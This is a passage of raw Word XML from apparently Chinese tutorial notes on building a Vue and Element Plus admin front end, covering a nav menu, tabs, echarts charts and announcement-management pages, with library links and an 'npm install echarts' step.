    <w:p w14:paraId="63CA609E" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;template #title&gt;item four&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E9782B" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-menu-item index="1-4-1"&gt;item one&lt;/el-menu-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B4039B" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;/el-sub-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFB200F" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/el-sub-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0909B59F" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-menu-item index="2"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548943E4" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-icon&gt;&lt;icon-menu /&gt;&lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE6556" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;span&gt;Navigator Two&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A82501D" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/el-menu-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64482107" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-menu-item index="3" disabled&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E280819" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          &lt;el-icon&gt;&lt;document /&gt;&lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB78E8" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;span&gt;Navigator Three&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA1D3F" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/el-menu-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0870BFE0" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-menu-item index="4"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687D9A83" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-icon&gt;&lt;setting /&gt;&lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D7EE3" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;span&gt;Navigator Four&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619A87F" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/el-menu-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51620EC4" w14:textId="77777777" w:rsidR="007D6422" w:rsidRPr="007D6422" w:rsidRDefault="007D6422" w:rsidP="009222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E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D6422">
        <w:rPr>
          <w:rFonts w:ascii="var(--code-font-family)" w:eastAsia="宋体" w:hAnsi="var(--code-font-family)" w:cs="宋体"/>
          <w:color w:val="6E6E6E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;/el-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31525EDB" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400DBF6A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="00181907" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7526C3" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5CFE34" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2990D1EE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D2646A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2962FEE4" w14:textId="387B716C" w:rsidR="008D57F2" w:rsidRDefault="00965096" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00965096">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签导航组件实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00965096">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00965096">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>样式布局</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4625C" w14:textId="77777777" w:rsidR="00965096" w:rsidRDefault="00965096" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E60E3E7" w14:textId="74D0893E" w:rsidR="00965096" w:rsidRDefault="00965096" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义标签页参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FEB73B" w14:textId="493A856F" w:rsidR="008D57F2" w:rsidRPr="00181907" w:rsidRDefault="00F2595A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00095502">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://element-plus.org/zh-CN/component/tabs.html#%E5%A2%9E%E5%8A%A0%E6%A0%87%E7%AD%BE%E9%A1%B5%E8%A7%A6%E5%8F%91%E5%99%A8%E8%87%AA%E5%AE%9A%E4%B9%89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC81618" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D047162" w14:textId="48BB40F1" w:rsidR="008D57F2" w:rsidRDefault="00095502" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下拉菜单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E8E33" w14:textId="6ED070DE" w:rsidR="008D57F2" w:rsidRPr="00095502" w:rsidRDefault="00095502" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00095502">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://element-plus.org/zh-CN/component/dropdown.html#dropdown-%E4%B8%8B%E6%8B%89%E8%8F%9C%E5%8D%95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18220CF4" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D57989F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5486FD80" w14:textId="7AFA2C5D" w:rsidR="008D57F2" w:rsidRDefault="007F79B8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>animate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一个开源动画库，有很多动画效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B80D83" w14:textId="391AA75A" w:rsidR="008D57F2" w:rsidRPr="00181907" w:rsidRDefault="007F79B8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007F79B8">
        <w:t>https://animate.style/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EB37A8" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC2CC12" w14:textId="737401F4" w:rsidR="008D57F2" w:rsidRDefault="00B4065D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B4065D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>echarts</w:t>
      </w:r>
      <w:r w:rsidRPr="00B4065D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图表组件开发和交互（一）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221BB68B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C36AA78" w14:textId="719021CF" w:rsidR="008D57F2" w:rsidRDefault="0032484B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0032484B">
        <w:t>https://echarts.apache.org/zh/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78368B5E" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="0032484B" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F8D83D1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5306CDB4" w14:textId="46A157CF" w:rsidR="008D57F2" w:rsidRPr="00181907" w:rsidRDefault="00102F37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装该组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470E57FE" w14:textId="20C94F04" w:rsidR="008D57F2" w:rsidRDefault="00102F37" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>npm install echarts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5290CE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5689E708" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="00936F1A" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03710097" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21305CCD" w14:textId="338B1FAD" w:rsidR="008D57F2" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="709" w:name="_Toc159780139"/>
      <w:r w:rsidRPr="00C554AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>公告模块布局实现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="709"/>
    </w:p>
    <w:p w14:paraId="5764E3F0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54894242" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5593583D" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59ECC710" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17586946" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5397835E" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRPr="00181907" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C03DB03" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30BFB02D" w14:textId="0D630D5A" w:rsidR="008D57F2" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="710" w:name="_Toc159780140"/>
      <w:r w:rsidRPr="00C554AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公告列表分页交互</w:t>
      </w:r>
      <w:bookmarkEnd w:id="710"/>
    </w:p>
    <w:p w14:paraId="44D66BCA" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F1FC1F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FDD15AB" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2307C5C5" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="793FF8D1" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F45966" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A14FD24" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EDB7B7C" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E622601" w14:textId="52401110" w:rsidR="008D57F2" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="711" w:name="_Toc159780141"/>
      <w:r w:rsidRPr="00C554AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公告新增功能实现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="711"/>
    </w:p>
    <w:p w14:paraId="6658A7D6" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29BB848B" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CB091D" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EF89C0A" w14:textId="77777777" w:rsidR="00C554AB" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722BB4C6" w14:textId="05295D9A" w:rsidR="008D57F2" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="712" w:name="_Toc159780142"/>
      <w:r w:rsidRPr="00C554AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公告删除和修改功能实现</w:t>
      </w:r>
      <w:bookmarkEnd w:id="712"/>
    </w:p>
